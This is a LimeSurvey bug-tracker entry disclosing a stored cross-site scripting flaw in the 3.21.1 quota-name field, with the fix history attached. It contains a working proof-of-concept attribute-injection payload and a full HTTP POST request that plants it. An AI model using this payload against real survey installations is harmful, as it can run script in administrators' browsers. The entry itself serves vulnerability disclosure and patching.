15681: LimeSurvey 3.21.1 Cross Site Scripting Stored - LimeSurvey bugs and feature requests

This bug affects 1 person(s).

ID	Project	Category	View Status	Date Submitted	Last Update

15681	Bug reports	LimeSurvey Website	public	2019-12-19 14:40	2021-06-28 13:25

Reporter	misheljava	Assigned To	galads
Priority	none	Severity	partial_block
Status	closed	Resolution	reopened
Product Version	3.21.1
Fixed in Version	3.21.2

Summary	15681: LimeSurvey 3.21.1 Cross Site Scripting Stored
Description	• Title: LimeSurvey 3.21.1 Cross Site Scripting (XSS) Stored • Date: 18/12/2019 • Author: Guram Javakhishvili • Email: misheljava@gmail.com, guramj@gmail.com • Software : LimeSurvey 3.21.1 • Product Version: 3.21.1 • Vulnerability Type : Injection • Vulnerability : Cross Site Scripting (XSS) Stored LimeSurvey latest version 3.21.1 & LimeSurvey development version 4.0.0 suffer from reflective and persistent (Stored) cross site scripting and html injection vulnerabilities. Insufficient validation of user input on the authenticated part of the Limesurvey application exposes the application to persistent cross site scripting (XSS) vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.
Steps To Reproduce	Steps to Reproduce: The attacker needs the appropriate permissions but non-Admin (can be basic user role) in order to create Survey and then add Quota. It was noted that the Add Quota function was found to be vulnerable to one instance of Stored Cross Site Scripting (XSS) vulnerability. When the survey Quota being viewed, e.g. by an administrative user, the JavaScript code will be executed in the browser. Vulnerable parameter: • Quota%5Bname%5D XSS payload: • me"onmouseover="alert('QuotaName')"style="position:absolute;width:100%;height:100%;top:0;left:0;"9e2ad// Steps to reproduce: Step 1 - Once the survey is created then open the survey and click on 'Quotas' at the bottom left hand side menu bar, click on it. Once it is open then insert the above XSS payload into the Quote name field and click save. (See first screenshot) http://localhost/limesurvey3.21.1/index.php/admin/quotas/sa/index/surveyid/158712# You should notice XSS payload rendering in the browser straightaway. See second screenshot .
Additional Information	HTTP Request/Response with vulnerable parameter and the XSS payload: POST /limesurvey3.21.1/index.php/admin/quotas/sa/newquota/surveyid/158712 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 632 Origin: http://localhost Connection: close Referer: http://localhost/limesurvey3.21.1/index.php/admin/quotas/sa/newquota/surveyid/158712 Cookie: LS-OOSUJAAJFRZHZYBG=tj260dpk0iuq6m9nkbtbcil9su; YII_CSRF_TOKEN=WkJDTFA4RDdmbUJvMVhVS0VNdXFaQzNCa2g5UnE1dnJRvylcV9_gUYN_cIoQdadDDRfuRrsY_3lxPsqhxgrh3A%3D%3D Upgrade-Insecure-Requests: 1 YII_CSRF_TOKEN=WkJDTFA4RDdmbUJvMVhVS0VNdXFaQzNCa2g5UnE1dnJRvylcV9_gUYN_cIoQdadDDRfuRrsY_3lxPsqhxgrh3A%3D%3D&Quota%5Bid%5D=&Quota%5Bname%5D=Fname%22onmouseover%3D%22alert%28%27QuoteName%27%29%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%229e2ad%2F%2F&Quota%5Bqlimit%5D=2&Quota%5Baction%5D=1&Quota%5Bactive%5D=0&Quota%5Bactive%5D=1&Quota%5Bautoload_url%5D=0&QuotaLanguageSetting%5Ben%5D%5Bquotals_message%5D=Sorry+your+responses+have+exceeded+a+quota+on+this+survey.&QuotaLanguageSetting%5Ben%5D%5Bquotals_url%5D=&QuotaLanguageSetting%5Ben%5D%5Bquotals_urldescrip%5D=&submit=Submit+Query HTTP/1.1 302 Found Date: Wed, 18 Dec 2019 23:47:20 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 X-Powered-By: PHP/7.3.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://localhost/limesurvey3.21.1/index.php/admin/quotas/sa/index/surveyid/158712 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
Tags	No tags attached.
Attached Files	image.png (105,060 bytes) image-2.png (109,496 bytes) image-3.png (51,873 bytes) image-3.png (51,873 bytes)

Bug heat	10
Complete LimeSurvey version number (& build)	limesurvey3.21.1+191210
I will donate to the project if issue is resolved	No
Browser	Chrome & Firefox
Database type & version	DB Server version: 10.4.6-MariaDB Database client version: libmysql - mysqlnd 5.0.12-dev - 20150407
Server OS (if known)
Webserver software & version (if known)
PHP Version	PHP version: 7.3.9

User List	DenisChenu, misheljava

~~markusfluer~~ 2019-12-19 16:37 administrator ~55096	Fix committed to master branch: http://bugs.limesurvey.org/plugin.php?page=Source/view&id=29294

lime_release_bot 2020-02-03 14:53 administrator ~55648	Fixed in Release 4.0.0+200116

DenisChenu 2021-06-27 17:33 developer ~65107	OK ! Partial fix only here …

DenisChenu 2021-06-28 13:25 developer ~65121	17388 ?

LimeSurvey: master a5f31781 2019-12-19 17:37 ~~markusfluer~~ Details Diff	Fixed issue 15681: LimeSurvey 3.21.1 Cross Site Scripting Stored	Affected Issues 15681
	mod - application/views/admin/quotas/_newanswer_equation.php	Diff File
	mod - application/views/admin/quotas/newanswer_view.php	Diff File
	mod - application/views/admin/quotas/viewquotas_quota_actions.php	Diff File
	mod - application/views/admin/quotas/viewquotas_quota_members.php	Diff File
	add - third_party/vimeo/psalm	Diff File

Date Modified	Username	Field	Change
2019-12-19 14:40	misheljava	New Issue
2019-12-19 14:40	misheljava	File Added: image.png
2019-12-19 14:40	misheljava	File Added: image-2.png
2019-12-19 14:40	misheljava	File Added: image-3.png
2019-12-19 14:58	cdorin	View Status	public => private
2019-12-19 14:58	cdorin	Description Updated
2019-12-19 14:58	cdorin	Steps to Reproduce Updated
2019-12-19 14:58	cdorin	Additional Information Updated
2019-12-19 15:06	cdorin	Assigned To	=> cdorin
2019-12-19 15:06	cdorin	Status	new => assigned
2019-12-19 15:22	DenisChenu	Issue Monitored: DenisChenu
2019-12-19 16:27	cdorin	Assigned To	cdorin => markusfluer
2019-12-19 16:37	~~markusfluer~~	Changeset attached	=> LimeSurvey master a5f31781
2019-12-19 16:37	~~markusfluer~~	Note Added: 55096
2019-12-19 16:37	~~markusfluer~~	Resolution	open => fixed
2019-12-19 16:37	~~markusfluer~~	Status	assigned => resolved
2019-12-19 16:37	~~markusfluer~~	Fixed in Version	=> 3.21.2
2020-02-03 14:53	lime_release_bot	Note Added: 55648
2020-02-03 14:53	lime_release_bot	Status	resolved => closed
2020-03-01 20:04	misheljava	Issue Monitored: misheljava
2020-05-04 09:43	ollehar	View Status	private => public
2021-06-24 12:37	DenisChenu	Assigned To	markusfluer => galads
2021-06-24 12:37	DenisChenu	Status	closed => feedback
2021-06-24 12:37	DenisChenu	Resolution	fixed => reopened
2021-06-27 17:33	DenisChenu	Note Added: 65107
2021-06-27 17:33	DenisChenu	Status	feedback => closed
2021-06-28 13:25	DenisChenu	Note Added: 65121

View Issue Details

Users monitoring this issue

Activities

Related Changesets

Issue History